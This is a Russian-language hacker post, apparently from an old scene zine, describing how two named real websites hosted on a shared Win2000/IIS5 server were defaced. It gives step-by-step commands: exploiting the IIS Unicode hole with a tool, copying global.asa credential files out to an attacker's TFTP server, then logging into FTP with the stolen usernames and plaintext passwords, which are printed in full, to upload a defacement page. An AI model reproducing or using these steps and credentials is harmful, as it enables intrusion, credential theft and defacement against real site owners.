Привет Перцы!
Сегодня я вам расскажу
как был сделан deface на http://www.novellconsulting.com
и http://nextage.co.uk.
Все уже умненькие и знают что такое IIS unicode
и с чем его едят... Прикол в том ,что когда
вывесили на xakep`e результат deface все вскричали , что быыыыыы!!! старая дыра...
Ну да ладно, теперь подробнее о "старой
дыре". И первый и второй сайт в реале
хостятся через http://aerohost.com,
который работает под "всеми нами любимой"
WIN2000/IIS5.0. Последний дыряв юникодно-безбожно,
но на этом дырки кончаются? Нет дорогой друг,
никак нет.
Если ты потелнетишься
на этот чудо-сервак на 21,25,139,1433 порты, то у
тебя появится много интересных мыслей
помимо UniCodE (веб сервак в данном случае не
имеет прав на запись в каталоги юзерей, но
имеет права на exec). Во-первых, в c:\mssql7\ стоит,
понятно что:)), - MSSQL7 (который позволяет тебе
получить interactive shell при наличии логина и
пассы локального юзверя).
Oki Oki Oki. Как получить
пассу?
Дубль №1 - ЮЗАЕМ ЗАНК и
LinSQL7!
../iis-zank -t aerohost.com -i
В каталогe c:\users\wrachel
есть клевый файл global.asa, в котором и хранится
имя юзверя и пасса. Далее tftp my_tftp_server PUT
c:\users\wrachel\global.asa Получив файло, мы теперь
можем шарахнуть LINSQL7 (прилагается)
по
серваку и делать свои делишки с правами SQL
сервака.
Дубль №2 - Получаем
доступ к ftp
В каталогах c:\users\rnovell
& c:\users\nextage тот же global.asa содержит данные ftp
аккаунтов
tftp my_tftp_server PUT
c:\users\rnovell\global.asa & tftp my_tftp_server PUT
c:\users\nextage\global.asa
Далее ftp aerohost.com
login: rnovell
passwd: cnt134
put real.gif (наше лого)
put default.htm (наш IndeX файл)
quit
ftp aerohost.com
login: nextage
passwd: oakbridge
put real.gif (наше лого)
put default.htm (наш IndeX файл)
quit
Вот и все...
